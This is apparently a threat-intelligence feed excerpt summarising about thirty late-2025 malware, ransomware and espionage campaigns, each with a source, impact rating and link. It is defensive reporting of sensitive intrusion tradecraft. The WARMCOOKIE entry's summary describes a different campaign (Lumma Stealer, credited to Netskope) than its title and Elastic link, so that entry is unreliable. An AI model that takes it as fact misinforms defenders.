Summary:: Researchers at Google Threat Intelligence Group and Mandiant have identified a widespread extortion campaign exploiting a previously unknown vulnerability in Oracle E-Business Suite (EBS), tracked as CVE-2025-61882. The threat actors, believed to be associated with the CL0P extortion operation, leveraged this zero-day flaw to gain unauthorized access to enterprise systems and exfiltrate sensitive data. The campaign began in late September 2025, with exploitation activity traced back to July, predating Oracle’s official patch release in early October. The attackers deployed multi-stage Java-based malware chains—GOLDVEIN.JAVA and SAGEGIFT—facilitating remote code execution, in-memory payload delivery, and post-exploitation reconnaissance from compromised application accounts. Mandiant observed strong technical and behavioral overlaps with previous activity attributed to FIN11 and UNC5936, suggesting shared tooling or operational alignment within established financially motivated threat ecosystems. The actors demonstrated a high level of operational maturity through automated exploitation, extortion-at-scale tactics, and use of established leak infrastructure.

Source: https://cloud.google.com/blog/topics/threat-intelligence/oracle-ebusiness-suite-zero-day-exploitation

Intel Source:: Polyswarm

Intel Name:: LockBit_5_0

Date of Scan:: 2025-10-13

Impact:: HIGH

Summary:: Researchers at PolySwarm have discovered a new version of LockBit ransomware (LockBit 5.0) that targets Windows, Linux, and VMware ESXi systems. This version is more advanced, using stronger obfuscation and anti-analysis techniques to avoid detection. The Windows variant hides its payload through packing and DLL reflection, disables security services, and clears event logs. The Linux version offers similar capabilities and allows attackers to choose which files or directories to encrypt. The ESXi version is tailored for virtual environments, enabling ransomware to spread quickly across multiple virtual machines from a single compromised host. LockBit 5.0 also randomizes file extensions and hides original file information, reducing the chance of file recovery. The ransomware avoids infecting systems using Russian language or regional settings, consistent with its previous versions. Overall, LockBit 5.0 is a powerful, cross-platform ransomware that increases the risk of large-scale network disruptions.

Source: https://blog.polyswarm.io/lockbit-5.0

Intel Source:: Seqrite

Intel Name:: AsyncRAT_Targets_Colombians_Users

Date of Scan:: 2025-10-13

Impact:: MEDIUM

Summary:: Seqrite researchers uncovered a phishing campaign written in Spanish that impersonates Colombia’s judicial system to deliver AsyncRAT through a multi-stage infection chain. The attack begins with a spoofed judicial notice containing an SVG attachment that launches a browser-based sequence to download a malicious HTA file. The HTA executes script stages and a PowerShell downloader, which retrieves a .NET loader. The loader performs anti-VM checks, establishes persistence, and injects AsyncRAT into a legitimate Windows process to evade detection. Once active, AsyncRAT enables keylogging, screen capture, process and service manipulation, and data exfiltration over TLS using chunked transmission for stealth and reliability. The campaign primarily targets Colombian users and officials, focusing on long-term access and information theft rather than disruption.

Source: https://www.seqrite.com/blog/judicial-notification-phish-colombia-svg-asyncrat/

Intel Source:: The Raven File

Intel Name:: RADAR_Ransomware_Activity_Resurfaces

Date of Scan:: 2025-10-12

Impact:: MEDIUM

Summary:: Researchers at TheRavenFile have identified renewed infrastructure and operational indicators linked to the RADAR Ransomware group, believed to be connected to the earlier Dispossessor Ransomware network active in 2020–2021. The group appears to have reconstituted its data leak platform, targeting approximately ten corporate entities, with U.S.-based organizations most frequently affected. The observed activity indicates a continued focus on double extortion tactics, where victim data is exfiltrated and exposed through an automated leak site framework. The actor demonstrates moderate technical proficiency, leveraging automated tools for victim data staging and evidence generation, and maintaining both clearweb and dark web resources for publication and negotiation. Although direct infection vectors were not detailed, the operational model suggests persistence of known ransomware behaviors centered on data theft, extortion, and publicity-driven pressure.

Source: https://github.com/TheRavenFile/Daily-Hunt/blob/main/RADAR%20Ransomware

Intel Source:: ForcePoint

Intel Name:: Email_Campaigns_Deliver_RATs_and_Infostealers

Date of Scan:: 2025-10-12

Impact:: MEDIUM

Summary:: Researchers at Forcepoint have observed a surge in phishing emails that use malicious JavaScript attachments to deliver information-stealing malware and remote access tools (RATs) across multiple industries. These emails are disguised as routine business communications, such as purchase orders, shipment updates, or quotations, and often written in the recipient’s local language to appear legitimate. The malicious JavaScript files are typically concealed within archive attachments and execute PowerShell commands to download additional payloads. In many cases, the malware is embedded within PNG images containing Base64-encoded data between BaseStart and BaseEnd markers, which is decoded into executable files. Once executed, the malware checks whether it is running in a virtual machine or under observation, injects itself into legitimate processes to execute only in memory, and maintains persistence on the system. Its primary objectives include credential theft, mailbox access, and remote control, with data exfiltration observed over SMTP and FTP channels.

Source: https://www.forcepoint.com/blog/x-labs/q3-2025-threat-brief-obfuscated-javascript-steganography

Intel Source:: StrikeReady Labs

Intel Name:: CN_APT_Serbian_Gov_Spearphish_Intrusion

Date of Scan:: 2025-10-11

Impact:: HIGH

Summary:: Researchers at StrikeReady Labs have identified a targeted spearphishing campaign attributed to a Chinese nation-state–linked advanced persistent threat (APT) actor aimed at the Serbian government. The activity began with a phishing email delivering a malicious attachment themed around the National Academy for Public Administration. Upon interaction, the lure directed victims to a fake Cloudflare verification page impersonating Microsoft’s login portal, leading to the execution of an obfuscated PowerShell payload. Analysis revealed the use of a DLL sideloading technique involving a Canon Printer Assistant binary to deploy a variant of the Sogu (PlugX/Korplug) malware family. This campaign demonstrates strong operational maturity, combining layered obfuscation, custom encoding, and realistic decoy documents to evade detection and maintain persistence. Subsequent investigation linked the campaign to coordinated targeting of multiple European government entities, highlighting its regional espionage focus. The operation’s objectives appear consistent with long-term intelligence collection, aligning with historical Chinese APT tradecraft observed in prior PlugX deployments.

Source: https://strikeready.com/blog/cn-apt-targets-serbian-government/

Intel Source:: ISC.SANS

Intel Name:: Nirorat_Polymorphic_Python_Remote_Access_Trojan

Date of Scan:: 2025-10-11

Impact:: HIGH

Summary:: Researchers at ISC.SANS have identified a previously undocumented Python-based Remote Access Trojan (RAT) exhibiting advanced polymorphic behavior. The malware, referred to as Nirorat, leverages Python’s introspection features to dynamically modify its own source code at runtime, enabling it to evade traditional static and signature-based detection methods. Through functions that alter variable names, shuffle function order, and inject junk code, the malware mutates its structure with each execution. It also uses in-memory encryption and decryption routines to obscure critical sections of code and execute them directly from memory. Analysis of its functionality reveals a comprehensive suite of capabilities typical of mature RAT families, including remote command execution, credential harvesting, system reconnaissance, and data exfiltration, as well as audio, screen, and keylogging features.

Source: https://isc.sans.edu/diary/rss/32354

Intel Source:: Point Wild

Intel Name:: Shuyal_Stealer_Multi_Browser_Credential_Theft

Date of Scan:: 2025-10-11

Impact:: HIGH

Summary:: Researchers at Point Wild have identified a new information-stealing malware dubbed Shuyal Stealer, which significantly broadens the scope of traditional browser-targeting threats. Written in 64-bit C++, the malware targets 19 different web browsers, including Chrome, Edge, Firefox, Brave, Opera, and Vivaldi, to extract stored credentials, cookies, and autofill data. It performs deep system profiling through Windows Management Instrumentation (WMI) to collect hardware identifiers and configuration data, enabling tailored attacks on infected machines. Shuyal employs sophisticated evasion tactics by forcefully terminating and permanently disabling the Windows Task Manager via registry modification, hindering detection and manual removal.

Source: https://www.pointwild.com/threat-intelligence/shuyal-stealer-advanced-infostealer-targeting-19-browsers

Intel Source:: Huntress

Intel Name:: Chinese_Attackers_Abuse_phpMyAdmin

Date of Scan:: 2025-10-11

Impact:: HIGH

Summary:: Huntress researchers uncovered a China-linked cyber campaign that began when attackers exploited an exposed phpMyAdmin panel to gain access through SQL log poisoning and a one-line PHP web shell used for remote command execution. Once inside, they leveraged an AntSword-style virtual terminal to directly control the compromised server and conduct system reconnaissance. The attackers then installed the open-source Nezha monitoring agent to establish persistent access, followed by the deployment of a modified Ghost RAT (Gh0st) variant capable of process injection and maintaining service-level persistence. To evade detection, the attackers modified Windows Defender exclusions and maintained continuous C2 communication through both Nezha and the RAT. Victims were identified across East and Southeast Asia, with additional instances in Europe and the Americas, indicating that the attackers were targeting organizations around the world.

Source: https://www.huntress.com/blog/nezha-china-nexus-threat-actor-tool

Intel Source:: Infoblox

Intel Name:: Detour_Dog_Turns_DNS_Into_Malware_Delivery_System

Date of Scan:: 2025-10-10

Impact:: HIGH

Summary:: Infoblox researchers have identified that the threat actor known as Detour Dog has been operating a DNS-based malware platform since at least August 2023, evolving from simple scam redirect schemes into a sophisticated infrastructure for command-and-control (C2) and malware delivery. The malware is embedded across tens of thousands of compromised websites globally, selectively redirecting users or executing code based on device type and geographic location. In 2025, this infrastructure was used to stage and distribute Strela Stealer—an infostealer linked to Hive0145—and the StarFish backdoor. A key tactic involves the use of DNS TXT records to deliver payload URLs, with commands prefixed by “down” triggering remote code execution on the server side. This obfuscation method hides true hosting locations and misleads defenders. Detour Dog also collaborates with spam botnets like REM Proxy and Tofsee to deliver malicious attachments that initiate the DNS-based infection chain. In August 2025, Shadowserver's sinkholing of Detour Dog domains revealed over 39 million TXT record queries in just 48 hours, originating from nearly 30,000 infected sites across 584 top-level domains, with the U.S., Germany, and Taiwan being the top traffic sources. The shift from ad fraud to supporting data theft through cooperation with actors like Hive0145 highlights Detour Dog’s transformation into a malware-as-a-service provider.

Source: https://blogs.infoblox.com/threat-intelligence/detour-dog-dns-malware-powers-strela-stealer-campaigns/

Intel Source:: Socradar

Intel Name:: Fake_Teams_Installers_Drop_Oyster_Backdoor

Date of Scan:: 2025-10-10

Impact:: MEDIUM

Summary:: SOCRadar researchers have identified a new malvertising and SEO poisoning campaign that impersonates Microsoft Teams installers to distribute the Oyster (aka Broomstick) backdoor. When victims download and execute the trojanized installer, it deploys a malicious DLL in a user-writable directory and establishes persistence by creating a scheduled task named CaptureService, executed via rundll32. Once activated, Oyster connects to its command-and-control (C2) server, enabling threat actors to perform system reconnaissance, data exfiltration, and lateral movement within the network. The malware can also load additional payloads, including ransomware, significantly increasing the operational impact. The campaign leverages fake advertisements and manipulates search results rather than software exploits for initial access and appears to have a global reach. The attackers primarily target IT managers and organizations in the healthcare, finance, and professional services sectors.

Source: https://socradar.io/fake-microsoft-teams-installers-oyster-backdoor/

Intel Source:: Fortinet

Intel Name:: A_New_Variant_of_Chaos_Ransomware

Date of Scan:: 2025-10-09

Impact:: MEDIUM

Summary:: Researchers at FortiGuard have identified a new C++ variant of the Chaos ransomware that targets Windows systems. The malware disguises itself as a fake “System Optimizer v2.1” and writes an execution log and then launches its payload with administrator privileges. It enforces single-instance execution via a mutex and, if a prior infection is detected, switches to a monitoring mode instead of re-encrypting files. When active, the ransomware scans common user directories and applies a size-based file selection strategy to either encrypting or deleting files to maximize victim pressure. It primarily uses AES-256-CFB encryption via Windows CryptoAPI, deletes shadow copies, tampers with boot configurations data, and overwrites original files to block recovery. After encryption, it drops a ransom note, shows a message box, and displays progress messages to the victim. A notable new feature allows it to hijack clipboard Bitcoin addresses, replacing them with attacker-controlled wallets to redirect ransom payments. Overall, this variant is designed for speed, disruption, and maximum impact.

Source: https://www.fortinet.com/blog/threat-research/evolution-of-chaos-ransomware-faster-smarter-and-more-dangerous

Intel Source:: ISC.SANS

Intel Name:: RedTail_Cryptojacking_Activity

Date of Scan:: 2025-10-09

Impact:: MEDIUM

Summary:: Researchers at ISC.SANS have identified ongoing RedTail cryptojacking activity targeting systems with exposed SSH services. RedTail, first observed in early 2024, focuses on mining Monero cryptocurrency by hijacking computational resources on compromised hosts. The malware gains access through brute-forced SSH logins and then deploys automated scripts to configure its environment and remove competing miners. Persistence is achieved by implanting SSH keys, allowing attackers to maintain control without repeating brute-force attempts. The campaign exhibits behaviors across several MITRE ATT&CK stages, including reconnaissance, weaponization, execution, persistence, defense evasion, and command-and-control.

Source: https://isc.sans.edu/diary/rss/32312

Intel Source:: Polyswarm

Intel Name:: Akira_Reloaded

Date of Scan:: 2025-10-09

Impact:: HIGH

Summary:: PolySwarm researchers have observed a significant rise in Akira ransomware attacks since July 2025, primarily driven by affiliates exploiting SonicWall VPN vulnerabilities to gain initial access. The attackers use stolen credentials and bypass MFA, then move quickly to complete their attacks within just 55 minutes by using various tools to scan networks, find valuable systems through Active Directory (AD) enumeration, and collect sensitive data for exfiltration. Akira’s affiliates often create new local or domain accounts and use remote management tools to maintain access. They have also been observed disabling endpoint security using vulnerable driver exploits. Once deployed, the ransomware payload encrypts both local and shared network files, followed by double extortion tactics, where stolen data is threatened to be leaked if victims refuse to pay. The campaign targets a wide range of sectors across the US, Europe, South America, Australia, Canada, India, and Africa, reflecting a well-organized RaaS model with active affiliates and significant financial motivation.

Source: https://blog.polyswarm.io/akira-reloaded

Intel Source:: Cisco Talos

Intel Name:: Velociraptor_Enabled_Ransomware_Operation

Date of Scan:: 2025-10-09

Impact:: HIGH

Summary:: Researchers at Cisco Talos have uncovered a new ransomware campaign in which attackers are abusing Velociraptor, an open-source DFIR tool, to stay hidden and maintain long-term access in compromised networks. The campaign is believed to be linked to the China-based group Storm-2603, which is known for exploiting ToolShell vulnerabilities in on-premises SharePoint. In this campaign, the attackers deployed an outdated and vulnerable version of Velociraptor containing a privilege escalation flaw (CVE-2025-6264) to gain full control over systems. They also used Visual Studio Code to establish a tunnel to their remote C2 server. Subsequently, the attackers deployed Warlock, LockBit, and Babuk ransomware to encrypt both Windows servers and VMware ESXi virtual machines. Additionally. the attackers created admin accounts, accessed the vSphere console, disabled Microsoft Defender protections, and used PowerShell scripts to exfiltrate data quietly while evading detection.

Source: https://blog.talosintelligence.com/velociraptor-leveraged-in-ransomware-attacks/

Intel Source:: Cofense

Intel Name:: Fake_Job_Phishing_Targets_Marketers

Date of Scan:: 2025-10-08

Impact:: HIGH

Summary:: Researchers at Cofense Phishing Defense Center have identified a sophisticated phishing campaign impersonating major brands including Tesla, Google, Ferrari, and Red Bull to target marketing and social media professionals seeking remote work. The threat actors crafted realistic recruitment emails using spoofed sender domains associated with legitimate services to evade security filters and establish credibility. Victims were enticed to engage with fake job postings that redirected them through multiple counterfeit login portals designed to capture credentials and personal data. The phishing infrastructure replicated trusted sites such as Glassdoor, Facebook, and Google to enhance legitimacy and exploit job seekers’ familiarity with online hiring platforms.

Source: https://cofense.com/blog/phishing-from-home-the-hidden-danger-in-remote-jobs

Intel Source:: Synthient Research

Intel Name:: GhostSocks_MaaS_Turns_Victims_Into_Proxy_Nodes

Date of Scan:: 2025-10-08

Impact:: HIGH

Summary:: Synthient researchers have reported on GhostSocks, a Malware-as-a-Service (MaaS) offering that has been sold since October 2023 on the Russian cybercrime forum. GhostSocks enables threat actors to convert compromised machines into SOCKS5 residential proxies, which are primarily used to facilitate fraud and provide anonymity services. Developed in Golang and obfuscated using the open-source garble project, the malware is subscription-based and lacks persistence, focusing solely on deploying and managing SOCKS5 proxy functionality. Operators manage infections through a web-based panel that supports geo-filtering, account management, and API integrations. Adoption of GhostSocks surged in 2024 following a partnership with Lumma Stealer, which began bundling GhostSocks as a monetization add-on, enabling operators to both exfiltrate sensitive data and monetize infected systems by reselling them as proxy nodes. Leaked 2025 chat logs from the BlackBasta ransomware group confirmed interest in GhostSocks as a tool for maintaining long-term access and generating revenue. On execution, GhostSocks uses a mutex (“start to run”), decrypts its relay configuration from the %TEMP% directory (or falls back to hardcoded C2s), and registers with its C2 infrastructure via HTTP using unique credentials. Once registered, it establishes a SOCKS5 proxy using the go-socks5 and yamux libraries. The result is a dual-impact threat: victims are first compromised and then exploited again as their devices are repurposed for criminal proxy services.

Source: https://synthient.com/blog/ghostsocks-from-initial-access-to-residential-proxy

Intel Source:: Malware Bytes

Intel Name:: Phishing_Scam_Impersonates_1Password_Alerts

Date of Scan:: 2025-10-08

Impact:: MEDIUM

Summary:: Malwarebytes researchers have identified a targeted phishing attack that impersonated 1Password’s Watchtower alerts to steal users vault credentials. The phishing email claimed that the recipient’s password had been exposed in a data breach and urged them to take immediate action. When victims clicked the embedded link, they were redirected through a third-party email tracker to a spoofed 1Password website designed to closely mimic the legitimate one. The fake login page requested the user’s email address, Secret Key, and master password which gives attackers full access to their 1Password vault. A successful compromise could have resulted in widespread account takeovers, as the stolen vault details would expose login credentials for multiple other services.

Source: https://www.malwarebytes.com/blog/news/2025/10/phishers-target-1password-users-with-convincing-fake-breach-alert

Intel Source:: Securelist (Kaspersky)

Intel Name:: ToddyCat_and_Others_DLL_Sideloading_via_ML_Detection

Date of Scan:: 2025-10-07

Impact:: HIGH

Summary:: Researchers at Kaspersky have identified multiple real-world DLL hijacking incidents using a newly deployed machine-learning model integrated into the Kaspersky Unified Monitoring and Analysis Platform (SIEM). The model was designed to automatically detect anomalous DLL load events by analyzing local attributes such as process paths, file hashes, and behavioral indicators, improving the accuracy of threat detection while reducing false positives. During pilot testing, the system successfully identified several attacks leveraging DLL sideloading for persistence and execution. In one case, the ToddyCat advanced persistent threat group exploited a SharePoint vulnerability to deploy a malicious payload through a hijacked system library, resulting in the execution of a remote access implant. Other detections included an infostealer disguised as a policy management module that exfiltrated browser data and a malicious loader delivered via removable media posing as legitimate antivirus software.

Source: https://securelist.com/detecting-dll-hijacking-with-machine-learning-in-kaspersky-siem/117567/

Intel Source:: Microsoft

Intel Name:: Exploitation_of_GoAnywhere_MFT_Vulnerability

Date of Scan:: 2025-10-07

Impact:: MEDIUM

Summary:: Researchers from Microsoft have observed active exploitation of a critical deserialization vulnerability (CVE-2025-10035) in GoAnywhere MFT’s License Servlet Admin Console. This vulnerability allows attackers to bypass signature verification using a forged license response, leading to command injection and potential RCE. Microsoft attributed the activity to Storm-1175, a threat group known for exploiting public-facing applications for initial access. The actor deployed RMM tools such as SimpleHelp and MeshAgent, along with malicious .jsp files within GoAnywhere directories to maintain persistence. The threat actor conducted system and network discovery using built-in commands and tools like netscan and achieved lateral movement through mstsc.exe. They leveraged the RMM tools and a Cloudflare tunnel to establish secure C2 communication. The campaign demonstrates a complete attack chain—from initial access to impact—covering persistence, discovery, lateral movement, C2, exfiltration, and ransomware execution.

Source: https://www.microsoft.com/en-us/security/blog/2025/10/06/investigating-active-exploitation-of-cve-2025-10035-goanywhere-managed-file-transfer-vulnerability/

Intel Source:: Oracle

Intel Name:: Oracle_EBS_Unauthenticated_RCE_Exploit

Date of Scan:: 2025-10-07

Impact:: HIGH

Summary:: Researchers at Oracle have identified a critical vulnerability, CVE-2025-61882, affecting the Oracle E-Business Suite (EBS), specifically versions 12.2.3 through 12.2.14. The flaw resides in the BI Publisher Integration component and allows unauthenticated remote code execution (RCE) over HTTP, enabling attackers to execute arbitrary commands without requiring credentials. The issue carries a CVSS 3.1 score of 9.8, indicating severe exploitation potential. Successful attacks could result in full system compromise, unauthorized data access, and operational disruption across enterprise environments that rely on Oracle EBS for financial and business process automation. Oracle advises that the vulnerability can be triggered remotely with low complexity and no prior access, making it an attractive target for threat actors seeking lateral movement within ERP-connected infrastructures.

Source: https://www.oracle.com/security-alerts/alert-cve-2025-61882.html

Intel Source:: Check Point Research

Intel Name:: Rhadamanthys_Stealer_Gains_New_Evasion_Features

Date of Scan:: 2025-10-07

Impact:: HIGH

Summary:: Researchers at Check Point have reported significant updates to Rhadamanthys, a multi-modular information stealer first released in 2022 and originally based on the Hidden Bee project. Now marketed under the names “RHAD Security” and “Mythical Origin Labs” across underground forums, Telegram, and Tor, Rhadamanthys has evolved into a mature Malware-as-a-Service (MaaS) platform. The latest version, 0.9.2, reflects major enhancements including revamped executable formats (XS1_B and XS2_B), removal of legacy registry key dependencies, and new mutex generation methods that render earlier defensive signatures obsolete. Sold in tiered pricing plans ranging from $299 to $499 per month—with enterprise options available—the stealer now boasts professional-grade infrastructure, indicating long-term operational intent. Version 0.9.2 introduces advanced anti-analysis techniques modeled after Lumma, enhanced sandbox evasion modules, and a new payload delivery mechanism using PNG files in place of earlier WAV or JPG-based steganography. Additional features include RC4-based string encryption, randomized injection targets, and obfuscated configuration data. Rhadamanthys targets a wide range of applications—including browsers, cryptocurrency wallets (now including Ledger Live), 2FA utilities, email clients, VPNs, and messaging platforms.

Source: https://research.checkpoint.com/2025/rhadamanthys-0-9-x-walk-through-the-updates/

Intel Source:: Cyfirma

Intel Name:: YUREI_RANSOMWARE

Date of Scan:: 2025-10-06

Impact:: HIGH

Summary:: Researchers at CYFIRMA have identified a new ransomware strain called Yurei, which specifically targets Windows systems. Yurei is designed to encrypt files rapidly while simultaneously obstructing recovery and forensic analysis. It deletes backups and Windows shadow copies, clears system logs, and alters file timestamps to hinder investigation. The ransomware spreads across networks through SMB shares, removable drives, and credential-based lateral movement techniques similar to PSExec. It stages payloads in temporary directories, leverages PowerShell scripts during execution, and changes the desktop wallpaper to signal compromise. Yurei employs the ChaCha20 encryption with unique keys generated per file. Victims face a double-extortion tactic, involving both ransom demands for decryption and threats of data leaks. Communication and victim shaming are conducted via Tor-based websites. Researchers also observed that Yurei shares code similarities with the open-source Prince ransomware.

Source: https://www.cyfirma.com/research/yurei-ransomware-the-digital-ghost/

Intel Source:: FortiGuard Labs

Intel Name:: Confucius_Espionage_Campaign_Evolves_to_Python_Backdoor

Date of Scan:: 2025-10-05

Impact:: MEDIUM

Summary:: FortiGuard Labs reports that the Confucius cyber-espionage group, active since 2013, has continued to evolve its tactics and toolset in recent campaigns. The group is believed to have state sponsorship and primarily targets South Asian government agencies, military organizations, defense contractors, and critical industries. Initially relying on document stealers like WooperStealer, Confucius has transitioned to more advanced payloads, including custom Python-based backdoors such as AnonDoor. Its initial access vectors frequently involve spear-phishing emails carrying malicious Office documents or LNK files. The campaigns show a consistent layering of obfuscation and persistence techniques such as DLL side-loading, registry modifications, and scheduled task abuse. Victim systems are profiled in detail, with exfiltration including documents, images, archives, and communication files. The latest Python-based AnonDoor variant demonstrates advanced command execution, file manipulation, and credential theft capabilities.

Source: https://www.fortinet.com/blog/threat-research/confucius-espionage-from-stealer-to-backdoor

Intel Source:: Picus Security

Intel Name:: RomCom_Hybrid_Espionage_Ransomware_Actor

Date of Scan:: 2025-10-05

Impact:: HIGH

Summary:: Researchers at Picus Security have identified RomCom, also tracked as Storm-0978, Tropical Scorpius, and Void Rabisu, as an evolving hybrid threat actor that blends state-aligned espionage with financially motivated ransomware operations. Originally operating in Eastern Europe, RomCom has expanded campaigns since 2023 to target government, defense, financial, manufacturing, logistics, retail, and hospitality sectors across Europe and North America. The actor employs spear-phishing, social engineering, and zero-day exploitation to gain access, followed by the deployment of multi-stage loaders and custom malware families such as SnipBot, RustyClaw, SlipScreen, DustyHammock, and ShadyHammock. Post-compromise activity includes credential theft through SAM hive dumping, lateral movement with SMBExec and WMIExec, and reconnaissance using custom tools to map victim environments.

Source: https://www.picussecurity.com/resource/blog/romcom-threat-actor-evolution

Intel Source:: Trend Micro

Intel Name:: SORVEPOTEL_WhatsApp_Malware_Spreading_in_Brazil

Date of Scan:: 2025-10-05

Impact:: MEDIUM

Summary:: Researchers at Trend Micro have identified a self-propagating malware campaign, dubbed SORVEPOTEL, actively spreading through malicious ZIP attachments shared over WhatsApp. Once executed, the malware establishes persistence on Windows systems, hijacks active WhatsApp sessions, and automatically sends copies of itself to all of a victim’s contacts and groups, driving rapid propagation. Campaign telemetry shows a strong concentration of activity in Brazil, with the majority of detected cases occurring there. Victim organizations include government, public services, manufacturing, technology, education, and construction sectors, indicating that the campaign extends beyond individual consumers. The attack chain relies on phishing messages crafted in Portuguese and disguised as receipts, budgets, or other common documents, leveraging trust in personal and professional communications.

Source: https://www.trendmicro.com/en_gb/research/25/j/self-propagating-malware-spreads-via-whatsapp.html

Intel Source:: Elastic

Intel Name:: WARMCOOKIE_Backdoor_Evolves_With_New_Handlers_and_C2

Date of Scan:: 2025-10-04

Impact:: MEDIUM

Summary:: Researchers at Netskope uncovered a new campaign delivering Lumma Stealer through a Nullsoft (NSIS) installer that leverages the legitimate AutoIt runtime to execute a hidden script. It drops an obfuscated batch file that renames and launches AutoIt, which then interprets an embedded script to continue execution. The stealer employs several evasion tactics, including environment checks, anti-debugging delays, analysis blocks, and DLL unhooking to bypass security tools. It establishes persistence by adding a shortcut in the Windows Startup folder, then decrypts and decompresses its main payload directly in memory. Although C2 activity was not observed due to inactive servers, the behavior strongly aligns with known Lumma Stealer operations. Victim organizations identified across telecom, healthcare, banking, and marketing sectors worldwide.

Source: https://www.elastic.co/security-labs/revisiting-warmcookie

Intel Source:: ASEC

Intel Name:: XiebroC2_Framework

Date of Scan:: 2025-10-04

Impact:: MEDIUM

Summary:: ASEC researchers have uncovered a campaign targeting internet-exposed Microsoft SQL servers through stolen credentials. Once attackers gained access, they leveraged privilege escalation tools from the Potato family to take full control of the system. They then deployed XiebroC2, an open-source C2 framework written in Go that runs on Windows, Linux, and macOS. The implant provided wide range of capabilities, including remote command execution, reverse shells, file and process management, proxying, screenshots, and network monitoring. The attackers downloaded the payload through PowerShell and connected to hard-coded C2 servers. Prior to adopting XiebroC2, the attackers had used the same access for cryptocurrency mining, a common method of monetizing compromised systems.

Source: https://asec.ahnlab.com/ko/90326/

Intel Source:: Trellix

Intel Name:: XWorm_V6_Plugins

Date of Scan:: 2025-10-04

Impact:: HIGH

Summary:: Trellix reports the unexpected return of XWorm in version 6, following its abandonment in late 2024. Originally developed by an actor known as XCoder, the malware resurfaced in mid-2025 through an account called XCoderTools, sparking debate on whether it is a continuation or an opportunistic rebrand. XWorm V6 maintains its modular design, allowing operators to deploy numerous plugins for tasks such as remote desktop control, credential theft, data exfiltration, surveillance, and ransomware deployment. Delivery commonly occurs via phishing emails that drop malicious JavaScript, PowerShell loaders, and DLL-based injectors, enabling stealthy execution and persistence. The plugin library includes capabilities for screen capture, process and file manipulation, TCP connection hijacking, and webcam activation. Stealer-focused modules target credentials from browsers, email clients, messaging platforms, and cryptocurrency wallets. The ransomware plugin encrypts user data and drops ransom notes, sharing notable code overlap with the earlier NoCry ransomware family.

Source: https://www.trellix.com/blogs/research/xworm-v6-exploring-pivotal-plugins/

Intel Source:: Zscaler

Intel Name:: COLDRIVER_BAITSWITCH_and_SIMPLEFIX_Backdoors

Date of Scan:: 2025-10-03

Impact:: HIGH

Summary:: Researchers at Zscaler ThreatLabz have observed the Russia-linked APT group COLDRIVER refreshing its intrusion playbook with a multi-stage sequence that begins on a ClickFix lure page and culminates in persistent PowerShell access. The lure coaxes targets into pasting a malicious command in the Windows Run dialog, which fetches a downloader DLL named BAITSWITCH. BAITSWITCH writes itself for logon persistence, retrieves staged components, and stores an AES-encrypted PowerShell stager in the registry. On the next user logon, that stager decrypts and launches the SIMPLEFIX backdoor, which communicates over HTTPS while masquerading as the Edge browser user-agent and checks in roughly every three minutes. SIMPLEFIX supports system reconnaissance, selective file harvesting from user directories, and retrieval or execution of follow-on payloads to extend control. Victimology aligns with COLDRIVER’s long-running focus on Russian civil-society actors, NGOs, and policy researchers across Russia and allied Western nations.

Source: https://www.zscaler.com/blogs/security-research/coldriver-updates-arsenal-baitswitch-and-simplefix

Intel Source:: CheckPoint

Intel Name:: PureCoder_PureHVNC_RAT_and_Sliver_Intrusion

Date of Scan:: 2025-10-02

Impact:: HIGH

Summary:: Researchers at Check Point Research have identified an eight-day intrusion campaign leveraging the ClickFix phishing technique to deploy components of the Pure malware ecosystem. Victims were enticed with fake job advertisements that led to the execution of malicious PowerShell, ultimately delivering the PureHVNC RAT. Over the course of the attack, operators introduced a Rust-based loader with persistence mechanisms and later transitioned to using the Sliver command-and-control framework. PureHVNC enabled covert remote access and included a broad plugin system supporting keylogging, audio and video capture, credential theft, distributed denial-of-service operations, and proxying capabilities. Technical analysis revealed advanced evasion methods, including anti-sandbox checks, AMSI bypass, obfuscation, and privilege escalation routines. Attribution linked the malware and supporting infrastructure to PureCoder, a developer known for producing modular malware such as PureCrypter, PureLogs, and PureMiner, with sales conducted via underground channels.

Source: https://research.checkpoint.com/2025/under-the-pure-curtain-from-rat-to-builder-to-coder/

Intel Source:: The Raven File

Intel Name:: Gunra_Ransomware_Targets_Global_Sectors

Date of Scan:: 2025-10-02

Impact:: HIGH

Summary:: Researchers at THE RAVEN FILE have identified Gunra as a newly emerged ransomware operation leveraging a double-extortion model, where threat actors exfiltrate and encrypt victim data before issuing steep ransom demands. Initial access is achieved through spear-phishing emails and a custom loader, followed by lateral movement using proprietary tools branded GUNRA. Once privileged access is obtained, the group encrypts up to 9 TB of data within 48 hours using Salsa20/ChaCha20 encryption and deletes over 60 shadow-copy backups to disrupt recovery. Gunra supports both Windows (EXE) and Linux (ELF) binaries, indicating active development and cross-platform reach. Victimology includes at least 18 organizations across manufacturing, healthcare, technology, finance, and services sectors, spanning South Korea, Brazil, Japan, Canada, the UAE, Egypt, Panama, and various Latin American and European countries, while notably excluding U.S.-based entities. Ransom negotiations are conducted through a Tor-based, WhatsApp-themed portal integrated with Slack, with demands ranging from 13 BTC to USD 10 million, though actors often settle for less—suggesting limited maturity. If payment is refused, stolen data are leaked via Tor sites or temporary clearnet mirrors.

Source: https://theravenfile.com/2025/09/23/gunra-ransomware-what-you-dont-know/

Intel Source:: ThreatBook

Intel Name:: Silver_Fox_APT_Hijacks_Trusted_Chinese_Domains

Date of Scan:: 2025-10-01

Impact:: MEDIUM

Summary:: Researchers at ThreatBook have identified Silver Fox, a Chinese black-market threat group leveraging advanced persistent threat (APT)-level tactics to mass-compromise Windows systems across government, education, and enterprise environments. The group exploits a remote code execution (RCE) vulnerability in kkFileView to plant trojanised software installers on legitimate .gov[.]cn, university, and corporate domains. These malicious installers impersonate widely used applications like DingTalk and Lark, with phishing documents and QR codes directing victims to trusted download links—effectively bypassing basic URL filtering. Once executed, a multistage loader chain leverages COM objects, ActiveX controls, and living-off-the-land binaries (LOLBins) to deliver a .NET component that injects a DLL and executes in-memory shellcode, granting full remote access, including screen viewing, audio capture, keylogging, file manipulation, and system reboots. Silver Fox further escalates its access by deploying vulnerable yet Microsoft-signed drivers (BYOVD), such as amsdk.sys and ZAM.exe, to disable endpoint detection and response (EDR) tools and obtain SYSTEM-level privileges on Windows 7 through 11. Infected machines automatically propagate phishing QR codes through instant messaging platforms, facilitating internal lateral movement. At least 30 Chinese domains have been compromised to date.

Source: https://mp.weixin.qq.com/s?__biz=MzI5NjA0NjI5MQ==&mid=2650184647&idx=1&sn=441b82a644acf9e0eccdda1bd8ada20c&poc_token=HKQmyWijlFQyqZP7mwo0HTHkW-QQZlCu5QofQVOP

Intel Source:: Polyswarm

Intel Name:: CastleRAT_TAG_150_Remote_Access_Troja

Date of Scan:: 2025-10-01

Impact:: HIGH

